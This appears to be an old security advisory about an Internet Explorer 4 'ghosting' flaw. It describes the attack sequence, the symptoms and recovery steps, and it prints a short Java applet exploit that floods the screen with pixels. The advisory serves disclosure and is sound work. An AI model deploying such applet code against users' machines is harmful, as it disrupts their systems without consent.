COMMAND

    Internet Explorer (ghosting attack)

SYSTEMS AFFECTED

    Win 9x, NT

PROBLEM

    Brian Krahmer posted following.  A Internet Explorer bug has been
    found.  Details can be found at:

        http://www.focus-asia.com/home/tjc/ghosting/

    Internet Explorer 4 has a flaw  that allows an applet to write  to
    its desktop or to other  windows.  The following is  a description
    (in  sequence)  of  the  ghosting  attack  which is done by a test
    applet which  draws white  (colour of  a ghost;  in code  below it
    was changed to black) image on the screen.  Here's the proccess:

        1. The victim visits the page
        2. The applet is loaded
        3. The applet fails to work.  The applet seems to be stuck  at
           the initialisation process
        4. The victim thinks that he/she has just loaded another badly
           coded applet
        5. The  victim  then  closes  the browser associated with  the
           "bad" applet
        6. The applet starts attacking the active window, the  desktop
           or Start menus usually after victim clicks mouse button

    The following are the symptoms on Internet Explorer 4 on a Pentium
    PC (don't forget to change black to white!):

        - White pixels will flood the whole desktop
        - White pixels will flood the menu bar/Start button
        - White pixels  will try to  flood active window  but not 100%
          successful
        - Victims may not see their mouse cursor.
        - Victims cannot see where they are clicking or where to click

    So, it basically only causes minor  annoyances.   On NT4, SP3, IE4
    4.01,  active  desktop  it  caused  explore.exe (Windows Explorer)
    processor usage to go  up to about 95%.   It is also effective  on
    Windows without active desktop  (at least 98 4.10.1681).   Exploit
    code follows (white pixels changed to black):

    // zealand.java - implements "ghosting" for IE with Active Desktop
    import java.applet.Applet;
    import java.awt.*;
    public class zealand extends Applet
    {
        public void init()
        { apd = size();
          draw();       }
        public void paint(Graphics g)
        { update(g);    }
        public void update(Graphics g)
        { flick(g);     }
        private void draw()
        { Graphics g = getGraphics();
          update(g);
          update(g);    }
        private void flick(Graphics g)
        { g.setColor(Color.black);
          g.fillRect(0, 0, apd.width, apd.height);    }
        public zealand()
        {    }
        Dimension apd;
        int x;
    }

SOLUTION

    Those familiar with windows will try to "end task" the explorer by
    using the famous CTRL+ALT+DEL.  However most victims will  restart
    their computer and had to wait for patch.  Such victims should log
    off and relogin for a fast recovery.